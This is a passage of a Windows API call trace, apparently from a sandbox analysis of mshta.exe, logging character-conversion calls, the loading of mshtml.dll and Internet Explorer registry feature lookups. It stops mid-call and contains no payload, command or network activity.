\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0024.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x40f6cc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1dê.\x86\x04ù@", lpUsedDefaultChar=0x0) returned 256 [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0024.599] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x40f0f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā") returned 256 [0024.599] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0024.599] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x40eee8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0024.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x40f5cc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1dê.\x86\x04ù@", lpUsedDefaultChar=0x0) returned 256 [0024.599] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2bb0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.606] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2b2aef) returned 0x0 [0024.606] GetLastError () returned 0x0 [0024.606] SetLastError (dwErrCode=0x0) [0024.606] GetLastError () returned 0x0 [0024.606] SetLastError (dwErrCode=0x0) [0024.606] GetLastError () returned 0x0 [0024.607] SetLastError (dwErrCode=0x0) [0024.607] GetLastError () returned 0x0 [0024.607] SetLastError (dwErrCode=0x0) [0024.607] GetLastError () returned 0x0 [0024.607] SetLastError (dwErrCode=0x0) [0024.607] GetVersion () returned 0x1db10106 [0024.607] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76c10000 [0024.607] GetProcAddress (hModule=0x76c10000, lpProcName="HeapSetInformation") returned 0x76c64157 [0024.607] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0024.607] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x40f964 | out: phkResult=0x40f964*=0x26) returned 0x0 [0024.607] RegQueryValueExA (in: hKey=0x26, lpValueName=0x0, lpReserved=0x0, lpType=0x40f95c, lpData=0x550e78, lpcbData=0x40f958*=0x105 | out: lpType=0x40f95c*=0x1, lpData="C:\\Windows\\System32\\mshtml.dll", lpcbData=0x40f958*=0x1f) returned 0x0 [0024.607] LoadLibraryA (lpLibFileName="C:\\Windows\\System32\\mshtml.dll") returned 0x63150000 [0026.020] GetVersion () returned 0x1db10106 [0026.020] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76c10000 [0026.020] GetProcAddress (hModule=0x76c10000, lpProcName="HeapSetInformation") returned 0x76c64157 [0026.020] HeapSetInformation (HeapHandle=0xf0000, HeapInformationClass=0x0, HeapInformation=0x40f5f4, HeapInformationLength=0x4) returned 1 [0026.176] GetVersion () returned 0x1db10106 [0026.178] GetVersionExA (in: lpVersionInformation=0x40f4cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f4cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.178] __dllonexit () returned 0x6337717c [0026.178] __dllonexit () returned 0x633773bd [0026.178] __dllonexit () returned 0x63377435 [0026.178] __dllonexit () returned 0x63376e75 [0026.179] __dllonexit () returned 0x63376ff5 [0026.179] __dllonexit () returned 0x633771be [0026.179] __dllonexit () returned 0x633772e2 [0026.179] __dllonexit () returned 0x63377320 [0026.180] __dllonexit () returned 0x63377370 [0026.180] __dllonexit () returned 0x63376e53 [0026.180] __dllonexit () returned 0x63376e66 [0026.180] __dllonexit () returned 0x63376a3e [0026.180] __dllonexit () returned 0x63376a46 [0026.181] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc197 [0026.181] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc197 [0026.181] __dllonexit () returned 0x63376a60 [0026.181] __dllonexit () returned 0x63376a7a [0026.181] __dllonexit () returned 0x63376a93 [0026.181] __dllonexit () returned 0x63376aa7 [0026.182] __dllonexit () returned 0x63376ac1 [0026.182] __dllonexit () returned 0x633771f1 [0026.182] __dllonexit () returned 0x63376ad0 [0026.183] __dllonexit () returned 0x63376adf [0026.183] __dllonexit () returned 0x63376aee [0026.183] __dllonexit () returned 0x63376afd [0026.183] __dllonexit () returned 0x63376b0d [0026.183] __dllonexit () returned 0x6337720c [0026.184] __dllonexit () returned 0x63376b1c [0026.184] __dllonexit () returned 0x63376b2f [0026.184] __dllonexit () returned 0x63376b49 [0026.184] __dllonexit () returned 0x63376b58 [0026.184] __dllonexit () returned 0x63376b67 [0026.185] __dllonexit () returned 0x63376b76 [0026.185] __dllonexit () returned 0x63376b85 [0026.185] __dllonexit () returned 0x63376b94 [0026.185] __dllonexit () returned 0x63376ba3 [0026.185] __dllonexit () returned 0x63376bb2 [0026.186] __dllonexit () returned 0x63376bc1 [0026.186] __dllonexit () returned 0x63376bd0 [0026.186] __dllonexit () returned 0x63376bdf [0026.186] __dllonexit () returned 0x63376bee [0026.186] __dllonexit () returned 0x63376bfd [0026.186] __dllonexit () returned 0x63376c0c [0026.187] __dllonexit () returned 0x63376c1b [0026.187] __dllonexit () returned 0x63376c2a [0026.187] __dllonexit () returned 0x63376c3d [0026.187] __dllonexit () returned 0x63376c4c [0026.187] __dllonexit () returned 0x63376c5b [0026.188] __dllonexit () returned 0x63376c75 [0026.188] __dllonexit () returned 0x63376c8f [0026.188] __dllonexit () returned 0x63376ca9 [0026.188] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0026.189] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0026.189] __dllonexit () returned 0x63376cb1 [0026.189] __dllonexit () returned 0x63377294 [0026.190] __dllonexit () returned 0x63376ccb [0026.190] __dllonexit () returned 0x63376cd3 [0026.190] __dllonexit () returned 0x63376ce2 [0026.190] __dllonexit () returned 0x63376cf1 [0026.190] __dllonexit () returned 0x63376d00 [0026.190] __dllonexit () returned 0x6336f72d [0026.191] __dllonexit () returned 0x63376d43 [0026.191] __dllonexit () returned 0x63376d56 [0026.191] __dllonexit () returned 0x6336f095 [0026.191] __dllonexit () returned 0x63376d65 [0026.191] __dllonexit () returned 0x63376d78 [0026.192] __dllonexit () returned 0x63376d87 [0026.192] __dllonexit () returned 0x63376d9a [0026.192] __dllonexit () returned 0x63372256 [0026.193] __dllonexit () returned 0x6337679d [0026.193] __dllonexit () returned 0x63376dd5 [0026.193] __dllonexit () returned 0x63376df8 [0026.193] __dllonexit () returned 0x63376e07 [0026.193] __dllonexit () returned 0x633776cb [0026.194] __dllonexit () returned 0x63376e1a [0026.194] __dllonexit () returned 0x633772aa [0026.194] __dllonexit () returned 0x633772cb [0026.195] __dllonexit () returned 0x63376e3a [0026.195] GetCurrentThreadId () returned 0xa1c [0026.195] CoCreateGuid (in: pguid=0x6368ad20 | out: pguid=0x6368ad20*(Data1=0x90052b94, Data2=0xf35f, Data3=0x4062, Data4=([0]=0xa8, [1]=0xfe, [2]=0x7d, [3]=0xa8, [4]=0xa1, [5]=0x94, [6]=0xe3, [7]=0x9e))) returned 0x0 [0026.201] __dllonexit () returned 0x6337733d [0026.201] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x40ef6c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.201] PathFindFileNameW (pszPath="C:\\Windows\\system32\\mShta.exe") returned="mShta.exe" [0026.201] StrCmpICW (pszStr1="mShta.exe", pszStr2="iexplore.exe") returned 4 [0026.201] StrCmpICW (pszStr1="mShta.exe", pszStr2="explorer.exe") returned 8 [0026.201] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x10d6d8 [0026.201] SHRegGetValueW () returned 0x2 [0026.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b8 | out: phkResult=0x40f1b8*=0x0) returned 0x2 [0026.202] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b4 | out: phkResult=0x40f1b4*=0x0) returned 0x2 [0026.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.202] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.263] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.285] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.285] RegCloseKey (hKey=0x0) returned 0x6 [0026.285] RegCloseKey (hKey=0x0) returned 0x6 [0026.285] RegCloseKey (hKey=0x74) returned 0x0 [0026.285] RegCloseKey (hKey=0x78) returned 0x0 [0026.285] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.285] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.286] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x78) returned 0x0 [0026.286] RegCloseKey (hKey=0x74) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: 